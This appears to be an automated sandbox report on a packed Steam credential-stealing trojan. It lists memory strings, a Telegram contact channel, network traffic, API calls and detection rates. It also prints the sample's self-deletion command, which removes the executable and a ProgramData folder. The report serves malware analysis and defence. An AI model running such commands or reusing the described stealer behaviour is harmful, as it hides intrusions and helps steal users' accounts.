          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a4
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownHTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.12:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49721 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00535D700_2_00535D70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030BD500_2_0030BD50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030A1300_2_0030A130
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00309B300_2_00309B30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00309B580_2_00309B58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: String function: 002F2000 appears 287 times
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@3/3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00301400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00301400
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00300900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,0_2_00300900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\76561199747278259[1].htmJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeReversingLabs: Detection: 63%
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeVirustotal: Detection: 69%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030CDD5 push ecx; ret 0_2_0030CDE8
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd or bat file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exitJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exe TID: 6340Thread sleep count: 80 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F1110
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F9D40 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F9D40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002F99F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00305A70 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00305A70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00305EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00305EA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002FAAB0
